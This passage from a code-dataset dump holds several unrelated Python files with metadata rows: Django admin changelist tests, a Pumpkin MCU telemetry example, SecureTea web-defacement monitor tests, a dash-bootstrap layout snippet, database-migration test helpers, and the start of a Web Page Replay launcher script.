results shouldn't appear more than once. With an intermediate model.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = GroupAdmin(Group, admin.site)
request = self.factory.get('/group/', data={'members': lead.pk})
cl = ChangeList(request, Group, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Group instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_through_m2m_at_second_level_in_list_filter(self):
"""
When using a ManyToMany in list_filter at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, admin.site)
request = self.factory.get('/concert/', data={'group__members': lead.pk})
cl = ChangeList(request, Concert, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Concert instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_inherited_m2m_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Model managed in the
        admin inherits from the one that defines the relationship.
"""
lead = Musician.objects.create(name='John')
four = Quartet.objects.create(name='The Beatles')
Membership.objects.create(group=four, music=lead, role='lead voice')
Membership.objects.create(group=four, music=lead, role='guitar player')
m = QuartetAdmin(Quartet, admin.site)
request = self.factory.get('/quartet/', data={'members': lead.pk})
cl = ChangeList(request, Quartet, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one Quartet instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_m2m_to_inherited_in_list_filter(self):
"""
Regression test for #13902: When using a ManyToMany in list_filter,
results shouldn't appear more than once. Target of the relationship
inherits from another.
"""
lead = ChordsMusician.objects.create(name='Player A')
three = ChordsBand.objects.create(name='The Chords Trio')
Invitation.objects.create(band=three, player=lead, instrument='guitar')
Invitation.objects.create(band=three, player=lead, instrument='bass')
m = ChordsBandAdmin(ChordsBand, admin.site)
request = self.factory.get('/chordsband/', data={'members': lead.pk})
cl = ChangeList(request, ChordsBand, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
cl.get_results(request)
# There's only one ChordsBand instance
self.assertEqual(cl.result_count, 1)
def test_distinct_for_non_unique_related_object_in_list_filter(self):
"""
        Regression tests for #15819: If a field listed in list_filters
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
# Two children with the same name
Child.objects.create(parent=parent, name='Daniel')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, admin.site)
request = self.factory.get('/parent/', data={'child__name': 'Daniel'})
cl = ChangeList(request, Parent, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_non_unique_related_object_in_search_fields(self):
"""
        Regression tests for #15819: If a field listed in search_fields
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
Child.objects.create(parent=parent, name='Danielle')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, admin.site)
request = self.factory.get('/parent/', data={SEARCH_VAR: 'daniel'})
cl = ChangeList(request, Parent, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_many_to_many_at_second_level_in_search_fields(self):
"""
When using a ManyToMany in search_fields at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, admin.site)
request = self.factory.get('/concert/', data={SEARCH_VAR: 'vox'})
cl = ChangeList(request, Concert, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# There's only one Concert instance
self.assertEqual(cl.queryset.count(), 1)
def test_pagination(self):
"""
        Regression tests for #12893: Pagination in the admin's changelist
        doesn't use the queryset set by the ModelAdmin.
"""
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
request = self.factory.get('/child/')
# Test default queryset
m = ChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all,
m.list_editable, m)
self.assertEqual(cl.queryset.count(), 60)
self.assertEqual(cl.paginator.count, 60)
self.assertEqual(list(cl.paginator.page_range), [1, 2, 3, 4, 5, 6])
# Test custom queryset
m = FilteredChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all,
m.list_editable, m)
self.assertEqual(cl.queryset.count(), 30)
self.assertEqual(cl.paginator.count, 30)
self.assertEqual(list(cl.paginator.page_range), [1, 2, 3])
def test_computed_list_display_localization(self):
"""
Regression test for #13196: output of functions should be localized
in the changelist.
"""
User.objects.create_superuser(
username='super', email='super@localhost', password='secret')
self.client.login(username='super', password='secret')
event = Event.objects.create(date=datetime.date.today())
response = self.client.get(reverse('admin:admin_changelist_event_changelist'))
self.assertContains(response, formats.localize(event.date))
self.assertNotContains(response, six.text_type(event.date))
def test_dynamic_list_display(self):
"""
Regression tests for #14206: dynamic list_display support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertNotContains(response, 'Parent object')
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ['name', 'age'])
self.assertEqual(list_display_links, ['name'])
# Test with user 'parents'
m = DynamicListDisplayChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
custom_site.unregister(Child)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['parent'])
# Test default implementation
custom_site.register(Child, ChildAdmin)
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
def test_show_all(self):
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
# Add "show all" parameter to request
request = self.factory.get('/child/', data={ALL_VAR: ''})
# Test valid "show all" request (number of total objects is under max)
m = ChildAdmin(Child, admin.site)
# 200 is the max we'll pass to ChangeList
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, 200, m.list_editable, m)
cl.get_results(request)
self.assertEqual(len(cl.result_list), 60)
# Test invalid "show all" request (number of total objects over max)
# falls back to paginated pages
m = ChildAdmin(Child, admin.site)
# 30 is the max we'll pass to ChangeList for this test
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, 30, m.list_editable, m)
cl.get_results(request)
self.assertEqual(len(cl.result_list), 10)
def test_dynamic_list_display_links(self):
"""
Regression tests for #16257: dynamic list_display_links support.
"""
parent = Parent.objects.create(name='parent')
for i in range(1, 10):
Child.objects.create(id=i, name='child %s' % i, parent=parent, age=i)
m = DynamicListDisplayLinksChildAdmin(Child, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/child/', superuser)
response = m.changelist_view(request)
for i in range(1, 10):
link = reverse('admin:admin_changelist_child_change', args=(i,))
self.assertContains(response, '<a href="%s">%s</a>' % (link, i))
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['age'])
def test_no_list_display_links(self):
"""#15185 -- Allow no links from the 'change list' view grid."""
p = Parent.objects.create(name='parent')
m = NoListDisplayLinksParentAdmin(Parent, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/parent/', superuser)
response = m.changelist_view(request)
link = reverse('admin:admin_changelist_parent_change', args=(p.pk,))
self.assertNotContains(response, '<a href="%s">' % link)
def test_tuple_list_display(self):
"""
Regression test for #17128
(ChangeList failing under Python 2.5 after r16319)
"""
swallow = Swallow.objects.create(
origin='Africa', load='12.34', speed='22.2')
model_admin = SwallowAdmin(Swallow, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/swallow/', superuser)
response = model_admin.changelist_view(request)
# just want to ensure it doesn't blow up during rendering
self.assertContains(response, six.text_type(swallow.origin))
self.assertContains(response, six.text_type(swallow.load))
self.assertContains(response, six.text_type(swallow.speed))
def test_deterministic_order_for_unordered_model(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model doesn't have any default ordering defined.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
UnorderedObject.objects.create(id=counter, bool=True)
class UnorderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
admin.site.register(UnorderedObject, UnorderedObjectAdmin)
model_admin = UnorderedObjectAdmin(UnorderedObject, admin.site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/unorderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
admin.site.unregister(UnorderedObject)
# When no order is defined at all, everything is ordered by '-pk'.
check_results_order()
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
UnorderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
UnorderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
UnorderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
UnorderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
UnorderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_deterministic_order_for_model_ordered_by_its_manager(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model has a manager that defines a default ordering.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
OrderedObject.objects.create(id=counter, bool=True, number=counter)
class OrderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
admin.site.register(OrderedObject, OrderedObjectAdmin)
model_admin = OrderedObjectAdmin(OrderedObject, admin.site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/orderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
admin.site.unregister(OrderedObject)
# When no order is defined at all, use the model's default ordering (i.e. 'number')
check_results_order(ascending=True)
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
OrderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
OrderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
OrderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
OrderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
OrderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_dynamic_list_filter(self):
"""
Regression tests for ticket #17646: dynamic list_filter support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = DynamicListFilterChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ['name', 'age'])
# Test with user 'parents'
m = DynamicListFilterChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ('parent', 'name', 'age'))
def test_dynamic_search_fields(self):
child = self._create_superuser('child')
m = DynamicSearchFieldsChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', child)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].search_fields, ('name', 'age'))
def test_pagination_page_range(self):
"""
Regression tests for ticket #15653: ensure the number of pages
generated for changelist views are correct.
"""
# instantiating and setting up ChangeList object
m = GroupAdmin(Group, admin.site)
request = self.factory.get('/group/')
cl = ChangeList(request, Group, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
per_page = cl.list_per_page = 10
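        # Each tuple below is (page number, total object count, expected page
        # range), where '.' marks a gap rendered between page ranges.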
for page_num, objects_count, expected_page_range in [
(0, per_page, []),
(0, per_page * 2, list(range(2))),
(5, per_page * 11, list(range(11))),
(5, per_page * 12, [0, 1, 2, 3, 4, 5, 6, 7, 8, '.', 10, 11]),
(6, per_page * 12, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, 10, 11]),
(6, per_page * 13, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, '.', 11, 12]),
]:
# assuming we have exactly `objects_count` objects
Group.objects.all().delete()
for i in range(objects_count):
Group.objects.create(name='test band')
# setting page number and calculating page range
cl.page_num = page_num
cl.get_results(request)
real_page_range = pagination(cl)['page_range']
self.assertListEqual(
expected_page_range,
list(real_page_range),
)
class AdminLogNodeTestCase(TestCase):
def test_get_admin_log_templatetag_custom_user(self):
"""
Regression test for ticket #20088: admin log depends on User model
having id field as primary key.
The old implementation raised an AttributeError when trying to use
the id field.
"""
context = Context({'user': CustomIdUser()})
template_string = '{% load log %}{% get_admin_log 10 as admin_log for_user user %}'
template = Template(template_string)
# Rendering should be u'' since this templatetag just logs,
# it doesn't render any string.
self.assertEqual(template.render(context), '')
def test_get_admin_log_templatetag_no_user(self):
"""
The {% get_admin_log %} tag should work without specifying a user.
"""
user = User(username='jondoe', password='secret', email='super@example.com')
user.save()
ct = ContentType.objects.get_for_model(User)
LogEntry.objects.log_action(user.pk, ct.pk, user.pk, repr(user), 1)
t = Template(
'{% load log %}'
'{% get_admin_log 100 as admin_log %}'
'{% for entry in admin_log %}'
'{{ entry|safe }}'
'{% endfor %}'
)
self.assertEqual(t.render(Context({})), 'Added "<User: jondoe>".')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_changelist.urls")
class SeleniumFirefoxTests(AdminSeleniumWebDriverTestCase):
available_apps = ['admin_changelist'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
# password = "secret"
User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
)
def test_add_row_selection(self):
"""
        Ensure that the status line for selected rows gets updated correctly (#22038)
"""
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:auth_user_changelist')))
form_id = '#changelist-form'
# Test amount of rows in the Changelist
rows = self.selenium.find_elements_by_css_selector(
'%s #result_list tbody tr' % form_id)
self.assertEqual(len(rows), 1)
# Test current selection
selection_indicator = self.selenium.find_element_by_css_selector(
'%s .action-counter' % form_id)
self.assertEqual(selection_indicator.text, "0 of 1 selected")
# Select a row and check again
row_selector = self.selenium.find_element_by_css_selector(
'%s #result_list tbody tr:first-child .action-select' % form_id)
row_selector.click()
self.assertEqual(selection_indicator.text, "1 of 1 selected")
class SeleniumChromeTests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class SeleniumIETests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| 45.8933
| 164
| 0.653339
|
59fc369152eefd23f8d84a524594bcea58fde0b2
| 1,427
|
py
|
Python
|
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2018 Kubos Corporation
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
"""
Example usage of the mcu_api
"""
import mcu_api
import time
MODULES = {
"sim": {"address": 80},
"gpsrm": {"address": 81},
"pim": {"address": 83},
"rhm": {"address": 85},
"bm2": {"address": 92}
}
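# NOTE: the addresses above are assumed to be the bus addresses of the Pumpkin
# supervisor modules on this particular stack; adjust them to match your
# hardware configuration.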
# Sending commands
module = "sim"
address = MODULES[module]['address']
print('\nModule: ' + module)
print('Address: ' + str(address))
mcu = mcu_api.MCU(address=address)
turn_led_on_cmd = "SUP:LED ON"
turn_led_off_cmd = "SUP:LED OFF"
print(mcu.write(turn_led_on_cmd))
time.sleep(3)
print(mcu.write(turn_led_off_cmd))
# Read a selection of telemetry items
module = "sim"
address = MODULES[module]['address']
fields = ["firmware_version", "commands_parsed", "scpi_errors", "time"]
print('\nModule: ' + module)
print('Address: ' + str(address))
print('Fields: ' + str(fields) + '\n')
mcu = mcu_api.MCU(address=address)
out = mcu.read_telemetry(module=module, fields=fields)
for field in out:
print(field, out[field])
# Read all telemetry from all modules
for module in MODULES:
module = str(module)
address = MODULES[module]['address']
print('\nModule: ' + module)
print('Address: ' + str(address) + '\n')
mcu = mcu_api.MCU(address=address)
out = mcu.read_telemetry(module=module)
for field in out:
print(field, out[field])
| 25.035088
| 71
| 0.670638
|
38f797ead2a7c58c381f6d36e539efcd6a2fc309
| 3,516
|
py
|
Python
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 257
|
2018-03-28T12:43:20.000Z
|
2022-03-29T07:07:23.000Z
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 155
|
2018-03-31T14:57:46.000Z
|
2022-03-17T18:12:41.000Z
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 132
|
2018-03-27T06:25:20.000Z
|
2022-03-28T11:32:45.000Z
|
# -*- coding: utf-8 -*-
import unittest
from securetea.lib.web_deface.monitor import Monitor
from securetea.lib.web_deface.deface_logger import DefaceLogger
from securetea.lib.web_deface.gather_file import GatherFile
from securetea.lib.web_deface.hash_gen import Hash
from securetea.lib.web_deface.defacement_detector import DefaceDetect
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestDefaceMonitor(unittest.TestCase):
"""
Test class for SecureTea Web Deface Monitor.
"""
@patch("securetea.lib.web_deface.monitor.json_to_dict")
@patch("securetea.lib.web_deface.monitor.shutil.copy")
def test_copy_file(self, mck_shutil_copy, mck_json_to_dict):
"""
Test copy_file.
"""
mck_json_to_dict.return_value = "random"
# Create Monitor object
self.monitor_obj = Monitor()
# Back-up dict
self.monitor_obj.back_up_dict = {"orig_path": "backup_path"}
self.monitor_obj.copy_file("orig_path")
mck_shutil_copy.assert_called_with("backup_path", "orig_path")
@patch.object(Monitor, "copy_file")
@patch.object(DefaceLogger, "log")
@patch.object(Hash, "hash_value")
@patch.object(Hash, "get_sets")
@patch.object(GatherFile, "scan_dir")
@patch("securetea.lib.web_deface.monitor.json_to_dict")
def test_monitor(self, mck_json_to_dict, mck_gthr, mck_hash, mck_set, mck_log, mck_copy):
"""
Test monitor.
"""
        # Mock the necessary dependencies
mck_json_to_dict.return_value = "random"
mck_gthr.return_value = ["random_path"]
mck_copy.return_value = True
# Case 1: File modification
mck_hash.return_value = {"random_path": "random_hash"}
mck_set.return_value = {"random_path": "random_hash"}
# Create monitor object
self.monitor_obj = Monitor()
self.monitor_obj.cache_hash = {
"random_path": "random_hash_new"
}
self.monitor_obj.cache_set = {
"random_path": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to modify file: random_path',
logtype='warning')
# Case 2: File addition
mck_hash.return_value = {"random_path": "random_hash",
"random_path_new": "random_hash_new"}
mck_set.return_value = {"random_path": "random_hash",
"random_path_new": "random_hash_new"}
self.monitor_obj.cache_hash = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.cache_set = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to add new file: random_path',
logtype='warning')
# Case 3: File deletion
mck_hash.return_value = {"random_path": "random_hash"}
mck_set.return_value = {"random_path": "random_hash"}
self.monitor_obj.cache_hash = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to delete file: random_path_new',
logtype='warning')
| 39.066667
| 99
| 0.620592
|
48d2217fd30ee0981feb51463e6beaf06d1bac1c
| 706
|
py
|
Python
|
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | 1
|
2021-05-08T08:21:41.000Z
|
2021-05-08T08:21:41.000Z
|
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | null | null | null |
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | null | null | null |
import dash_bootstrap_components as dbc
import dash_html_components as html
row = html.Div(
[
dbc.Row(
[
dbc.Col(html.Div("One of three columns"), md=4),
dbc.Col(html.Div("One of three columns"), md=4),
dbc.Col(html.Div("One of three columns"), md=4),
]
),
dbc.Row(
[
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
]
),
]
)
| 30.695652
| 72
| 0.483003
|
0b9fdcdbe7bca44a103fa9a2c3b6e7ec22a3f2cf
| 2,083
|
py
|
Python
|
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | 1
|
2017-12-14T22:20:30.000Z
|
2017-12-14T22:20:30.000Z
|
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
import glob
import os
import unittest
import codecs
from simple_db_migrate.config import *
def create_file(file_name, content=None, encoding='utf-8'):
f = codecs.open(file_name, 'w', encoding)
if content:
f.write(content)
f.close()
return file_name
def create_migration_file(file_name, sql_up='', sql_down=''):
create_file(file_name, 'SQL_UP=u"%s"\nSQL_DOWN=u"%s"' % (sql_up, sql_down))
return file_name
def delete_files(pattern):
filelist=glob.glob(pattern)
for file in filelist:
os.remove(file)
def create_config(host='localhost', username='root', password='', database='migration_example', migrations_dir='.', utc_timestamp=False, script_encoding='utf-8'):
config_file = '''
DATABASE_HOST = '%s'
DATABASE_USER = '%s'
DATABASE_PASSWORD = '%s'
DATABASE_NAME = '%s'
DATABASE_MIGRATIONS_DIR = '%s'
UTC_TIMESTAMP = %s
DATABASE_SCRIPT_ENCODING = '%s'
''' % (host, username, password, database, migrations_dir, utc_timestamp, script_encoding)
create_file('test_config_file.conf', config_file)
return FileConfig('test_config_file.conf')
class BaseTest(unittest.TestCase):
def tearDown(self):
delete_files('*.log')
delete_files('*test_migration.migration')
delete_files('migrations/*test_migration.migration')
if os.path.exists(os.path.abspath('migrations')):
os.rmdir(os.path.abspath('migrations'))
if os.path.exists(os.path.abspath('test_config_file.conf')):
os.remove(os.path.abspath('test_config_file.conf'))
def assertRaisesWithMessage(self, excClass, excMessage, callableObj, *args, **kwargs):
raisedMessage = ''
try:
callableObj(*args, **kwargs)
except excClass, e:
raisedMessage = str(e)
if excMessage == raisedMessage:
return
if hasattr(excClass,'__name__'): excName = excClass.__name__
else: excName = str(excClass)
raise self.failureException, "%s not raised with message '%s', the message was '%s'" % (excName, excMessage, raisedMessage)
| 35.913793
| 162
| 0.679309
|
335142be0a429e0cfea3109578e96a6e6c744822
| 411
|
py
|
Python
|
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
"""Miscellaneous segments for my tmux status-line."""
from .base import StatusMiscSegment
from .mpd import MPDSegment
from .github import GithubNotificationsSegment
from .nordvpn import NordVPNSegment
from .mullvad_vpn import MullvadVPNSegment
from .notmuch import NotMuchSegment
from .transmission import TransmissionNotificationSegment
from .battery_life import BatteryLifeSegment
| 34.25
| 57
| 0.800487
|
595cff82d3e8d43b15dc25f35e2ff0ece82a1f99
| 9,035
|
py
|
Python
|
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | 1
|
2019-07-22T23:03:26.000Z
|
2019-07-22T23:03:26.000Z
|
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | null | null | null |
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A class to help start/stop a Web Page Replay Server.
The page cycler tests use this module to run Web Page Replay
(see tools/build/scripts/slave/runtest.py).
If run from the command-line, the module will launch Web Page Replay
and the specified test:
./webpagereplay_utils.py --help # list options
./webpagereplay_utils.py 2012Q2 # run a WPR-enabled test
"""
import logging
import optparse
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import time
import urllib
USAGE = '%s [options] CHROME_EXE TEST_NAME' % os.path.basename(sys.argv[0])
USER_DATA_DIR = '{TEMP}/webpagereplay_utils-chrome'
# The port numbers must match those in chrome/test/perf/page_cycler_test.cc.
HTTP_PORT = 8080
HTTPS_PORT = 8413
class ReplayError(Exception):
"""Catch-all exception for the module."""
pass
class ReplayNotFoundError(Exception):
pass
class ReplayNotStartedError(Exception):
pass
class ReplayLauncher(object):
LOG_FILE = 'log.txt'
def __init__(self, replay_dir, archive_path, log_dir, replay_options=None):
"""Initialize ReplayLauncher.
Args:
replay_dir: directory that has replay.py and related modules.
          archive_path: either a directory that contains WPR archives or
a path to a specific WPR archive.
log_dir: where to write log.txt.
replay_options: a list of options strings to forward to replay.py.
"""
self.replay_dir = replay_dir
self.archive_path = archive_path
self.log_dir = log_dir
self.replay_options = replay_options if replay_options else []
self.log_name = os.path.join(self.log_dir, self.LOG_FILE)
self.log_fh = None
self.proxy_process = None
self.wpr_py = os.path.join(self.replay_dir, 'replay.py')
if not os.path.exists(self.wpr_py):
raise ReplayNotFoundError('Path does not exist: %s' % self.wpr_py)
self.wpr_options = [
'--port', str(HTTP_PORT),
'--ssl_port', str(HTTPS_PORT),
'--use_closest_match',
# TODO(slamm): Add traffic shaping (requires root):
# '--net', 'fios',
]
self.wpr_options.extend(self.replay_options)
def _OpenLogFile(self):
